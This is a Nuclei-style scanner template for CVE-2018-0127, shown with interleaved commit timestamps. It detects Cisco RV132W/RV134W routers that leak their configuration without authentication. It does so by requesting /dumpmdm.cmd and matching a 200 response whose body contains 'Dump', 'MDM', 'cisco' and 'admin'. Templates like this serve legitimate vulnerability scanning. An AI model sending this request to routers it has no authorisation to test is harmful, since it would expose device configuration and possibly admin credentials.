2021-10-01 19:30:31 +00:00
id : CVE-2018-0127
2021-10-01 23:03:14 +00:00
2021-10-01 19:30:31 +00:00
info :
2022-05-13 20:26:43 +00:00
name : Cisco RV132W/RV134W Router - Information Disclosure
2021-10-01 19:30:31 +00:00
author : jrolf
severity : critical
2022-05-13 20:26:43 +00:00
description : Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device via the web interface, which could lead to the disclosure of confidential information.
2021-10-01 23:05:32 +00:00
reference :
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2
2022-07-01 10:02:07 +00:00
- http://web.archive.org/web/20211207054802/https://securitytracker.com/id/1040345
2022-06-07 20:50:59 +00:00
- http://web.archive.org/web/20210226170218/https://www.securityfocus.com/bid/102969
2022-05-13 20:26:43 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-0127
2022-04-22 10:38:41 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2018-0127
cwe-id : CWE-306
tags : cve,cve2018,cisco,router
2021-10-01 19:30:31 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/dumpmdm.cmd"
2021-10-01 23:03:14 +00:00
2021-10-01 19:30:31 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
2021-10-01 23:03:14 +00:00
2021-10-01 19:30:31 +00:00
- type : word
2021-10-05 18:12:16 +00:00
part : body
condition : and
2021-10-01 19:30:31 +00:00
words :
- "Dump"
- "MDM"
- "cisco"
- "admin"
2022-05-13 20:26:43 +00:00
# Enhanced by mp on 2022/05/12